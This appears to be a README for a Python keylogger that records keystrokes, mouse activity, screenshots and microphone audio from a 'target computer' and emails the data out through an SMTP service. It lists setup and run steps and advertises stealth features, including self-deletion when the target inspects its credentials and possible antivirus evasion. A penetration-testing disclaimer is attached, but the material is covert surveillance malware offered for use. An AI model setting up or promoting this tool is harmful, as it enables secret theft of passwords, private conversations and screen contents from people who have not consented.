A Python script that captures keyboard, mouse, screenshot, and microphone inputs from a target computer and sends the data to your email.
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
This tool is primarily used for testing the security of information systems by monitoring user inputs and activities on an endpoint. Security professionals or penetration testers can use it to evaluate vulnerabilities related to endpoint data leakage and unauthorized surveillance.
Use this tool only on systems you have explicit permission to test to avoid legal issues. The script self-deletes if the target attempts to inspect the email credentials, enhancing stealth. It relies on an SMTP service like Mailtrap for email delivery, so proper configuration is necessary. Antivirus detection may vary, so use caution in deployment environments.
Create an account on https://mailtrap.io/ using a temporary email
Set your SMTP USERNAME and SMTP PASSWORD in keylogger.py
Run pip install -r requirements.txt to install dependencies
Execute the script using python3 keylogger.py
python3 keylogger.py
Starts the keylogger script to begin capturing inputs and sending data to configured email.